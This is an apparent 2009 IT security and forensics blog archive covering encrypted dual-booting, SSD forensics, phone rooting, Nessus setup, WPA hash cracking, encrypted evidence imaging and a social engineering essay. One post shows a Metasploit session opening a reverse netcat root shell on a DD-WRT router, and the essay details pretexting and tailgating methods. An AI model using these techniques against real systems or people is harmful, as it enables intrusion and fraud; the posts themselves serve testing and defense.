Monday, 2 November 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I am dual booting Windows XP and BackTrack and have both operating systems installed on a fully encrypted partitions. The follow is a rough guide to setting it up. It may not be the best way of setting up this type of configuration but if works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.

Before starting you may want to wipe your entire hard drive.
  • dd if=/dev/urandom of=/dev/hda
Windows XP encrypted with TrueCrypt 6.3
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted

Install Windows XP first (200GB)

Boot off BackTrack4 cd. fdisk /dev/hda create a /boot partition (hda2) 200MB create a / partition (hda3) remainder of disk. Setup the encrypted partition.

  • modprobe aes-i586
  • cryptsetup luksFormat /dev/hda cryptsetup luksOpen /dev/hda3
  • rootmkfs.ext3 –j –O extent /dev/mapper/root

Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root

Do not reboot just yet we need to modify a few files.

  • mkdir /mnt/root
  • mount /dev/mapper/root /mnt/root
  • mount /dev/hda2 /mnt/root/boot
  • chroot /mnt/root
  • mount –t proc proc /proc
  • mount –t sysfs sys /sys

Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
  • root /dev/hda3 none luks

Next step is to edit /etc/fstab. The / should look like this. Amend if needed.

  • /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1 /dev/hda2 /boot ext3 defaults 0 0

Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.




Update your initrd with the following command.
  • update-initramfs –k all –c
I got an error when it tried to create an initrd file for kernel but BackTrack4 comes with so as long as you get no errors on the initrd for you should be good.

Now time to fix grub.
  • cd /boot/grub/ nano menu.lst

Your BackTrack section should look like this.

  • title BackTrack 4
  • uuid Your uuid of boot partition
  • kernel /vmlinuz- root=/dev/mapper/root ro initrd /initrd.img- quiet
Next we need install grub
  • grub-install /dev/hda
exit from the chroot environment. Unmount /mnt/root/boot and /mnt/root

Using TrueCrypt I fully encrypted the windows system partition (not full disk encryption) through TrueCrypt 6.3 and let it write its bootloader to the MBR. This will overwrite GRUB.

Don't worry we'll fix this later.

Boot with BackTrack cd and copied the truecrypt bootloader from the MBR to a file in the /boot partition. In my case hda2

I used these commands to do so:

  • dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
  • dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256

Reinstalled grub to the MBR using these commands:
  • sudo grub
  • install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
Added a chainloader to the menu.lst Windows XP entry to point to the truecrypt bootloader within the /boot partition:

title XP
rootnoverify (hd0,0)
chainloader (hd0,1)/truecrypt.mbr

Monday, 21 September 2009

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers one of which was a DELL R900 with 4x 6 core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information , see the SQL Books Online....

Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However it it not possible to slipstream a service pack into SQL 2005 install cd / dvd. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

Thursday, 13 August 2009

SSD Drives and IT Forensics - Update

In previous post The implication of new firmware released for OCZ SSD on computer forensics I asked a number of questions. The post was also send to an internal mailing list where I work. A number of responses came back and I thought I'd share them

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?

No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSD's now have the ability to use TRIM under win7, linux, OSX but only where the operating system, firmware, and associated software are correctly installed.

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).

Wednesday, 12 August 2009

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds, thanks Google Reader for making this so easy, I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the write from a performance standpoint the IT Forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive even if the drive has been used over a long period of time . The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages that are arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little even if it fills only a single page in the block,the entire block must be re-written.

This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already contained in the cell has to be copied to the cache, the new data to be added is then added to the cache, the old data in the cell is then erased and the new information in the cache copied to the memory cell. As time passes and all the cells are partially filled with old data,the SSD slows down as new data has to be added using the same process.

Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.

Now what the new firmware from OCZ does is to apparently
fix this while the drive is idle by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.

From a forensics perspective could this be considered a built-in "wiping" function on SSD drives. It is also worth noting that this could become the standard for all SSD drives.

This raises the following questions:

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.

UPDATE - Questions answered

Monday, 10 August 2009

Root on HTC Magic


1 Click Android Rooting ...

I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AdnroidSDK\tools

I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the usb cable, open a command prompt and and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,misc and cache images will be copied to the phones SD card.

I then followed The Unlockr's Guide, unfortunately this didn't work for me and my phone just hung on at the Vodafone splash screen. I left it for about 20mins thinking that maybe it was doing some post load installs, but no not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: How do I get the backup back on to my phone. I tried to re-flash it by first wiping the failed flash

fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot

No sure luck all the fastboot flash options returned the same error:

FAILED (remote: signature verify fail)

Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools

So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools

fastboot boot recovery-RAv1.2.0G.img

The phone will boot the recovery image and you will notice and option titled

Nandroid V2.2 Restore

Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.

Monday, 3 August 2009

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If like me you update and deploy software to new workstation on a regular basis you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS Pre-Install sata drivers and extract to a temporery location on the machine (c:\tmp).

Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the Driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open Select OK

Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When system boots enter the bios, navigate to the SATA Operation option or equivlant and set it to AHCI
Verify your sata ports enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.

Sunday, 26 July 2009

Expoliting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened ( ->
uname -a
Linux DD-WRTx86CI #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

DD-WRT httpd vulnerability

As reported at there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.

Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As immediate action please disable the remote Web GUI management. But that limitation could be easily overridden by a Cross-Site Request Forgery (CSFR) where a malicious website could inject the exploit from inside the browser.

They guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download the these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned above to obtain the files.

The exploit can also be stopped, using a firewall rule: Go to your router's admin interface to > Administration > Commands and enter the following text:insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
press "Save Firewall" and reboot your router. This rule blocks any attempt to access sth that has "cgi-bin" in the url. You can verify that the rule is working by entering:;reboot in your browser. That should give a "Connection was reset" (Firefox).

Important Note: This only works for non-https requests. if you have HTTPS Management turned on under > Administration > Management > Remote Access, then turn it off. If you don't want to turn it off, you only can do an Update.

Friday, 15 May 2009

Disable System Beep In VMWare

Is the system beep in vmware hurting your ears when linux or FreeBSD machines are reboot.
Add the following line to the .vmx file for that vmware machine.

mks.noBeep = "TRUE"

Friday, 1 May 2009

Forensics and Disk Encryption

The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems.The traditional method of “pull the plug” then forensically image the hard drive is changing

Before powering down a computer, consider the potential of encryption software being installed on the computer or as part of the operating system. If present, appropriate forensic methods should be utilised to capture the encrypted data before the computer is powered down.

There are essentially two competing solutions

  • Gather the “best” evidence available
  • Allow the system to continue operation in an unhindered manner

With encrypted drives becoming more common in the corporate environment this means that without the cooperation of the suspect or a master key / password supplied by the IT department the data essentially unreadable.

Under APCO guidelines (Good Practice Guide for Computer based Electronic Evidence V.3) there are no guidelines for the collection of encrypted hard drives. Similarly the US Secret Service Best Practice Guide for Seizing Electronic Evidence V.3 makes no mention of encrypted hard drives either.

Identifying encrypted disks

It depends on how the encryption works. You may want to look for the following.
icons in the taskbar
startmenu entries
common filenames and paths (pointsec , safeguard easy , drivecrypt , PC Guardian)Looking at the MBR, most of the diskencryption software use pre boot auhtentication (for example safeguard)
Look at mounted devices in the registry, good way to determine volume encryption (for example truecrypt)

Prerequisites for live imaging

Document everything you do. Document everything you ask a trusted system administrator / information security person to do. In order to image a live system you need to be logged on as a local admin level user. The end result is the need to gather an evidential copy of a system.

A physical disk image may not be the best evidence as the data may be unreadable. Live aquaisation enables the investigator to gather volatile information such as memory, process list, network connections, open files etc.

What is live imaging

Taking a copy of a system while that system is still functioning in a live environment

Why would you image a live machine ?

Business critical systems that cannot be shut down. Shutting down systems may create legal liability for examiners through:

damaging equipment
unintentional data loss
hampering operations
Instructions that evidence gathering must be conducted using the least intrusive methods available.
Encrypted volumes


Helix (dd/netcat)
Prodiscover IR
Encase EEE/FIM

Issues surrounding imaging a live system.

The system is essentially “un-trusted”. This raises the following questions. How do we know we have collected all the original evidence on an un-trusted system? Can the machine be accessed remotely? Rootkits ?

Some options available for forensic imaging of encrypted drives.

Non Live Image

Microsoft Windows system
Capture live data, memory dump, current network connections, open files , running processes. Shut down machine normaly. Pulling the plug may cause data loss on encrypted drives.

Remove the drive

Image the drive using a forensic disk cloner such as a SOLO

Option 1

Single capture using two drives. Target and Backup
Bag & Tag the original
Bag & Tag the target
Boot suspect machine using the backup and admin level credentials
Live image of the machine

Option 2

DD capture using two drives
Bag & Tag the original
Bag & Tag the target
Restore backup dd image to a “restore drive”

Option 2A

Boot suspect machine using the “restore drive” and admin level credentials
Live image of the machine

Option 2B

Mount restore drive in VMware
Boot suspect machine using the “restore drive” and admin level credientials Live image of the machine

Image the drive with encase then follow Option 2A or Option 2B

Live Image

Microsoft Windows system
Capture live data, memory dump, current network connections, open files , running processes
Disconnect from network both wired and wireless.
Run ftkimager from a trusted cd or usb drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date).
Create a logical evidence file of each logical drive on a external usb hard drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date) ensuring you hash the drive contents.
Create a backup copy of the logical evidence files on another drive.
You may also create the two copies at the same time by connecting the two drives to the suspect machine.
Verify both target and backup images.

Thursday, 23 April 2009

Backtrack 4 Beta and Nessus 4.0.0

I recently installed Nessus 4.0.0 on a vmware install of BackTrack 4 Beta. Below are the steps I took.

Download the following linux packages from the nessus website.


You will also need to register in order to obtain the activation key.

Before installing we will need to install some missing dependencies

apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant

Install the server.

# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb

Configure the certificate

# /opt/nessus/sbin/nessus-mkcert

Add the admin user

# /opt/nessus/sbin/nessus-adduser

# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'

# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb

# /etc/init.d/nessusd start

And start the client from the Menu>Intenet>NessusClient or use the CLI

Wednesday, 22 April 2009

Social Engineering Investigations

Below is a general outline for investigating social engineering style attacks. This article is meant for discussion purposes only.

One thing you need to be aware of is that social engineering is not just limited to IT systems it is an issue for the entire organisation.

Social engineering attacks can vary from low tech to high tech.

There are many factors that can lead to a successful social engineering attack.

Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.

Organisations need to be aware of just how much information they are giving away on their websites.

Its also common practice in organisations that a users email address will be the same as their network user name. The password for email may also be the same as the network logon, this is normally true in situations where a organisation is using Microsoft Exchange.

Armed with this information an attacker may call the help desk posing as someone in a senior position in the organisation asking for "help" on how to connect to the network from home. Help desk staff have been surprisingly helpful to me in the past when I have attempted this type of attack.

An attacker may also pose as a sales rep or as an employee of a IT related magazine or journal or even as someone seeking employment and ask to speak to the help desk / IT department. When connected they would ask a series of questions relating to the computer systems in place. Such as operating systems ( Windows, Apple Mac's, Linux / Unix) network infrastructure, wireless, remote access, web based email etc.

This information can help an attacker target specific areas of the network, such as wireless access points or remote access systems.

Also organisations will typically have large bins outside the premises, around the back, near the car park, basement level etc. Since the bins are collected and / or emptied by third parties access to them is rarely restricted.

The amount of information that can be recovered from looking through a companies rubbish can be very rewarding. Such as customer records, employee records, financial statements and other sensitive company data. This style of attack is commonly known as "dumpster diving".

These points would typically be the first steps as the attacker never has to enter the building to gain access to sensitive information about the organisation. This raises and interesting question, since people are volunteering the information has the attacker broken any laws ? Also if the bins are in a publicly accessible / shared area has the attacker broken any laws by "dumpster diving" ?

An attacker could also just walk in the front door, past security and reception staff. Mornings and lunchtimes are always a good time to attempt this as there is a constant flow of people leaving and going in to the building.

Other common entry points would be via the car park. But by far the best way in is with the smokers. The attacker will hang around outside and start chatting to other smokers and then just walk into the building with them. Once in the building its easier to move around because if your there people assume that your supposed to be there, after all you've been seen outside smoking and talking with genuine employees. An attacker may then install various keyloggers , covert wireless access points or other bugging devices. Even something as simple as walking up to a printer and taking "your" printout will go unnoticed.

The likelihood of the above attacks been detected are low.

Prevention of some of these types of attacks can also be difficult.

The physical security of the building and its associated property should be monitored by a combination of monitored cctv and security guards. Bins should be locked and / or held in a secure area until they are collected.

Now for the IT side of things. This is normally shorter as the trick is to get into the building. The majority of the time sensitive data in not stored on employees computers or laptops but in servers. These servers are typically stored in locked rooms that are secured by a physical lock and or an electronic lock such as a swipe card or proximity card. Access is generally restricted to a few IT staff. If the attacker wanted to gain access to this room for whatever reason, stealing the physical hardware for example, they would first need to out who has access to the room and then attempt to covertly copy their access card.

Often if the attacker really needs to access server stored data, its more efficient to attempt to "hack" into the network from the inside or even simply find a desk and call the IT department and ask them to reset "your" password.

The attacker may even simply pick up a laptop and walk out.

If the attacker really needs access to the server room they may pose as a engineer from one of the organisations 3rd party support vendors or even from the local telecoms company. A little work with some logo's downloaded from the vendors website, a colour printer and a laminator or plastic card printer are all that's needed to add credibility to the attackers "story" as to why access is needed. Add in a few businesses cards with the "office" phone number and a work order and the attacker may even be given unsupervised access to the server room or other sensitive areas of the business such as meeting and conference rooms.

The more high tech attacks are normally associated with phishing style attacks where an attacker will setup a fake website to look identical to the organisations and a URL that closely matches the organisations. The attacker will typically focus on the logon page or other page that prompt the user for sensitive information. The end user will typically not know that their details have been "stolen". In the more sophisticated version of this attack the attacker will capture the user data and then "send" that data to the genuine site for processing. If the details are correct to user will be presented with a valid session if not they will get the standard logon failed message.

Now the people side of things is always going to be the hard part to protect yourself from.

Staff will need to be trained on the Do's and Don'ts of both the security surrounding the building and the IT systems.

The help desk staff should be trained to ask specific security questions in order to verify the identity of user, relying on caller id or someones post code, zip code or date of birth is not sufficient. Caller id is easy to fake and a persons home address is not too difficult to obtain.

Reception staff, PA's and sectaries are your first line of defence against telephone style attacks. These staff members should be trained in filtering out the false calls from the genuine. Keep in mind that not all false callers can stopped here but can at least be slowed down.

All employees should be made to feel comfortable to challenge people who they personally do not recognise or any "employee" not displaying a valid id card.
All non employee visitors the building should be escorted everywhere.
Visitors should not be given access to the organisations network unless authorised.
Be wary of IP telephones in semi public areas such as a reception area, as these phones are connected to the organisations internal network and typically have two network ports all an attacker would need to do is connect their laptop to the IP phone to connect to the organisations network. The same applies to wired / wireless internet access for guests. Guest internet access should be on a separate network segment or vlan with deny access to the corporate lan.

Do you think you would fall victim to a social engineering attack.?Ask yourself the following questions:

Do I know everyone in the building ?
Would I hold a access controlled (swipe / proximity card) door open for someone if they were carrying something ?
Would I challenge someone if I could not see their employee id badge ?
Would I lend mine to someone who approached me at the coffee machine if they said they left theirs in their car ?
Would I let someone in if I saw then chatting to one of the PA's or secretaries ?
If someone called me on an internal extension claiming to be from the IT department would I give them my password ?

People are the weak link in the chain here. An attacker will use peoples natural willingness to help against then. This is why social engineering attacks work, its because they are allowed to work.

Investigating these type of attack.

The fact that you know an attack has taken place is a good start.
How was it detected ?
When was it detected ?
When did the attack take place ?
How was the attack carried out ?

How to investigate this type of attack is one that needs to be handled carefully. The aim really being "How did someone manage to steal our assets? Be that information or hardware or both."
This would typically start with interviewing any persons identified from the previous questions. One thing to keep in mind is that people will feel embarrassed about coming forward and talking about the "attack".

They may feel guilty about any information they may have divulged. I would suggest that a third party conduct these interviews anonymously, ie. people do not have to give their names to the interviewer and the interview is carried out in confidence that no disciplinary action will be taken. The attack will have succeeded because of either a lack of controls or the lack of proper implementation, monitoring and enforcement of controls. Take the employee id card as an example. Most policies state that "employees are required to have their ID cards visible at all times". Is this true for the organisation ? Is this policy actually enforced ? In my experience the companies that enforce this are few and far between.

The results of these attacks will usually result in your staff been more aware of just how easy it is to leak data without even knowing it. I feel that an organisation should notify all its staff when an social engineering style attack has been discovered so they may all learn from it. Remember that your staff are your first line of defence against a social engineer.

Tuesday, 21 April 2009

EnCase and Tableau Forensic Bay

Came across this issue today and though I'd share it with you.

I recently installed the latest version of EnCase Version Reading the release notes states that hard drives connected to Tableau Write Blockers are now recognized by EnCase as been write blocked. Since we use a large number of Tableau devices I started testing.

In testing I have found this to be true for the Tableau T35es, T35e, T3u , T4, T14 and the T15.

When testing with the T335 (Forensic Drive Bay Controller Firmware 6.22) I found the that EnCase is not correctly identifying a drive as been write blocked.

Test Results

IDE - Set to Read Only
SATA1 - Set to Read Only
SATA2 - Set to Read Only

EnCase see's all drives as Write Blocked

IDE - Set to Read Write
SATA1 - Set to Read Write
SATA2 - Set to Read Write

EnCase see's all drives as not Write Blocked

IDE - Set to Read Only
SATA1 - Set to Read Write
SATA2 - Set to Read Only

EnCase see's all drives as Write Blocked.

This can be an issue because if you believe what EnCase is telling you when you are creating a forensic image of a suspect drive and it is in a read/write bay you may accidentally alter potential evidence however the EnCase report will state that the drive was acquired while write blocked.

I have made Guidance Software aware of this issue.

Guidance Software have created defect number 28371 for this issue.

Monday, 20 April 2009

Install OpenOffice 3.01 in Backtrack 4 Beta

I decided to install OpenOffice in Backtrack since it is not part of the default pack because of size limitations. I always find it useful to have a spreadsheet application installed as part of my Pen-Testing toolkit.
Get the Linux DEB. I am using the English (US)

tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz
cd OOo_inst_folder/DEBS
dpkg -i *.deb

(Not sure this is needed for KDE but I did it for the icons in kmenuedit)
cd desktop-integration
dpkg -i *.deb

Add it to KDE if you are using Gnome you don't need to do this.

Click on Utilities
Ctrl+N (New)

Name: OpenOffice3 (or what ever you want)
Command: /opt/openoffice.org3/program/soffice
Click on the blank icon next to name and pick an icon for open office
Ctrl+S (Save)

Thursday, 16 April 2009

Increase the number of tcp connections in Windows XP


Half-open limit fix is a program designed to change the maximum number of concurrent half-open outbound TCP connections (connection attempts) in the Windows system file tcpip.sys.

Microsoft first introduced this limit in Windows XP SP2 (Service Pack 2) and is present in all later versions of Windows. This was done to try to slow the spreading of viruses and malware from system to system and also to reduce the impact of infected systems participating in DoS (Denial of Service) attacks.

This limit makes it impossible for Windows systems to have more than 10 concurrent half-open outbound connections. After 10, new connection attempts are put in a queue and forced to wait.

Wednesday, 15 April 2009

FreeNAS - Transmission and Windows Remote Client

I've been playing around with FreeNAS for some time now and have migrated an old Debian server over to FreeNAS in order to make things easier for the non-linux members of our team.

The server hosts all the deployment images for our lab workstations amoung other non-sensitive data. The images are deployed via pxe. more on that to follow in another post.

I recently looked at the BitTorrent service which seems like a good idea. All your torrents are controlled and downloaded to centeral location. Ideal in a lab environment. Downloading the latest version of Ubuntu or OpenOffice is now as simple as dropping the .torrent file in to shared directory and letting FreeNAS take care of the rest.

The majority of the lab workstations are Windows box's so I went to the Transmission website to download the Windows remote client. It was then that I found that Transmission do not have a Windows client.

A few google minutes later I find transmission-remote-dotnet on the google code page. I installed it, configured it to connect to the FreeNAS server and now have it running without any issues on a test machine.

Thursday, 2 April 2009

VMWare Shared Folders and BackTrack 4 Beta

I finally got around to trying out the latest version of Backtrack 4 Beta. Using VMWare Workstation 6.5.1 I enabled "Shared Folders" so I could use some pre-complied tables. However when I browsed to /mnt/hgfs I see a blank folder.
Trying mount.hgfs .host:/ /mnt/hgfs/ gave the following error. Error: cannot mount filesystem: No such device

To fix this issue follow these steps.

Download and extract the latest tarball of open-vm-tools from sourceforge.

Download and extract the latest glib tarball from because open-vm-tools require it

Install glib
./configure && make && make install

Satisfy dependencies of open-vm-tools.
./configure --without-dnet --without-x --without-unity --without-icu && make && make install

Reboot and use the following command to mount your VMWare Shared Folder.

mount -t vmhgfs .host:/ /mnt/hgfs/

Wednesday, 1 April 2009

Add Pre-Computed WPA hashes to airolib

First I obtained the 33GB rainbow table from

Please note that the 33 GB file is compressed using a number of methods so you need a lot of space to decompress the hash files.

When file is downloaded (wpa_psk-h1kari_renderman.tar.lzma) extract the file, I used 7zip.
Once extracted you are left with wpa_psk-h1kari_renderman.tar

Next step is to decompress the .tar, I used 7zip.
When the extraction is complete you will have 9 folders these folders contain the pre-compiled Hashes.

Now all you have to do is know what essid you are looking for I assume you are Auditing your OWN NETWORK or have permission to audit your clients network.


I want to audit a wireless network with WPA encryption with an essid of "Private"

airolib-ng testdb --import cowpatty /mnt/sdb1/wpapsk/xag-0/Private

There will then be some reading and writing to "testdb"

airolib-ng testdb --stats

you should see your essid computed to 100%

Thursday, 19 March 2009

Creating Encrypted Forensic Images

Recently we have been as by some of our clients to encrypt the forensic images we have collected before leaving their site. Below are two possible solutions to this.

Hardware Capture Method

Using a solo or talon create a standard dd image of the suspect hard drive.
As the drive is being imaged, using a forensic laptop, create a TrueCrypt volume on a new ntfs formatted hard drive. Make sure that the TrueCrypt volume size is large that the disk that is being imaged.

When the solo or talon has finished imaging robocopy the dd image to the mounted TrueCrypt volume.

Verify the the image can be opened without any errors.
Securely erase the images from the non encrypted drives using your local standard method.

Software Capture Method

Create a TrueCrypt encrypted hard drive formatted as NTFS.
This can be done in advance as it will take some time to format and encrypt a 500GB hard drive

Using FTK, EnCase, DD, etc.

Mount the TrueCrypt encrypted drive.
Connect the suspect drive to a write blocker.
Create a image of the drive as normal to the TrueCrypt mounted drive.
When complete robocopy image to another TrueCrypt encrypted "backup" hard drive.

I'd be interested to know how others are dealing with these requests. Has anyone used Seagate's Momentus 5400 FDE.2 drive to accomplish this before ?

Thursday, 19 February 2009

Recover Deleted Outlook Items

Open the PST in the Hex editor.

Delete positions 7 through 13 with the spacebar.
Since you're using hexadecimal numbering, this actually clears 13 characters in the following positions:
00007, 00008, 00009, 0000a, 0000b, 0000c, 0000d, 0000e, 0000f, 00010, 00011, 00012, 00013
As you clear the characters, the editor displays the code “20” in their position.

Save the PST, it is now corrupted.

Run the Inbox Repair Tool, SCANPST.exe, to recover the file.

On Win2K and WinNT systems, the executable is located in
C:\Program Files\Common Files\System\Mapi\1033\NT

You can also find it on the Office 2000 CD-ROM in
\Program Files\Common\System\Mapi\1033\NT.

On Windows XP, the file is located in
C:\Program Files\Common Files\System\Mapi\1033

And Windows XP Office XP/2002 SP2
C:\Program Files\Common Files\System\MSMAPI\1033

The Inbox Repair Tool creates a backup and repairs the damage and recreates the PST.

Open the new PST in Outlook.

The Deleted Items folder should now contain the deleted messages, unless Outlook has already deleted them by compacting the PST.